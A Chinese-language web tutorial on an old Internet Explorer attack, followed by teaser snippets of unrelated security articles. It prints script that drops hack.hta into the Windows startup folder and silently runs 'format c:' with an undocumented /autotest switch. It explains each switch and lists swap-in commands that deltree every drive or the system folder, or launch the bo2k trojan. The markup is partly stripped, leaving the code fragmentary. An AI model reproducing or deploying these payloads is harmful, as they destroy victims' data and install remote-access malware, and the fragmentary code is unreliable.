前敘∶
這項技術是在沒多久以前台灣所流行的攻擊法,你知道利用漏洞的厲害在哪嗎?這一項教學就是利用微軟 ( microsoft )的ie瀏覽器( internet explorer )所衍生出來的攻擊方法。
教學開始∶
以下這段就是具有破壞性的html
hacking your computer .
scr.reset();
scr.path="c:\\windows\\start menu\\programs\\啟動\\hack.hta";
scr.doc="
wsh.run('start.exe /m format c:/q /autotest /u');
alert('important : windows is removing unused temporary files.');";
scr.write();
(懂html的人應該就看得出來其中精隨)
現在我大概來解釋其中幾個專案所寫的意思
scr.path="c:\\windows\\start menu\\programs\\啟動\\hack.hta"
這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,並命名為 hack.hta
wsh.run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。
它是乙個微軟沒有公開的功能,鍵入後format的動作便會被強制執行。
這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。
最後start.exe再配合/m選項可以使format的dos-prompt視窗在執行的時候處於最小化的狀態。
執行其他攻擊指令的方法∶
只要修改「start.exe /m format c:/q /autotest /u」這一項便形。
start.exe /m format c:/q /autotest /u
其中的「c:」可以換做其他的硬碟。
(path)\bo2k.exe
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
殺掉對方硬碟底下所有的檔案。
start.exe /m deltree /y c:\windows\system\*.*
殺掉對方c:\windows\system\目錄底下的所有檔案。
後敘∶
預防遭此手段的破壞就是到微軟去更新你的瀏覽器。
遊戲與網頁CC攻擊防護原理
cc攻擊可以歸為ddos攻擊的一種。他們之間都原理都是一樣的,即傳送大量的請求資料來導致伺服器拒絕服務,是一種連線攻擊。cc攻擊又可分為 cc攻擊,和肉雞cc攻擊。cc攻擊是黑客借助 伺服器生成指向受害主機的合法網頁請求,實現dos,和偽裝就叫 cc challenge collapsar 而肉雞c...
藝電(EA)網頁遊戲遭攻擊癱瘓
文章 驅動之家 ea公司表示,他們的網頁填字遊戲 scrabble beta 由於受到黑客攻擊而被迫下線。scrabble beta 是ea在facebook 上以頁面外掛程式形式提供的小遊戲,但近兩日來玩家幾乎完全無法訪問。ea表示他們是受到了惡意攻擊,並正在努力解決問題。這一事件出現的時間點非常...
網頁指令碼攻擊防範全攻略 一
網頁指令碼攻擊防範全攻略 一 近來,網路上的sql injection 漏洞利用攻擊,js指令碼,html指令碼攻擊似乎逾演逾烈。陸續的很多站點都被此類攻擊所困擾,並非像主機漏洞那樣可以當即修復,來自於web的攻擊方式使我們在防範或者是修復上都帶來了很大的不便。hooo 乙個站長最大的痛苦莫過於此。...